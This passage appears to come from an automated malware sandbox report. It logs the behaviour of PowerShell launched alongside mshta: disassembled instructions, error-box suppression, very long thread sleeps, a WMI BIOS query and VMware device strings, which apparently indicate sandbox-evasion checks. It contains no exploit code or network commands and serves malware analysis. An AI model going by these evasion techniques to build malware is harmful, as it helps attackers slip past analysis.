                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04F0D98C push ds; iretd 6_2_04F0D993
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04F0D965 push ds; iretd 6_2_04F0D98B
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04F0D96D push ds; iretd 6_2_04F0D98B
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0752D0F6 push ebx; retf 6_2_0752D101
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_07528B53 push FFFFFF8Bh; retf 6_2_07528B57
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0752B966 push FFFFFFE9h; ret 6_2_0752B969
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077516A2 push cs; iretd 6_2_077516A4
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_07750DCC push esp; retf 6_2_07750DCD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0775E430 push eax; ret 6_2_0775E48D
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077F4653 push FFFFFF8Bh; iretd 6_2_077F4658
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077F456E push FFFFFF8Bh; iretd 6_2_077F4573
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077F59A8 push FFFFFF8Bh; iretd 6_2_077F59B6
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077F0033 push esp; retf 6_2_077F0039
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3498Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 905Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4586Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5135Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7680Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7668Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7808Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7632Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: powershell.exe, 00000004.00000002.1761761572.0000000007530000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: powershell.exe, 00000004.00000002.1761877979.0000000007565000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
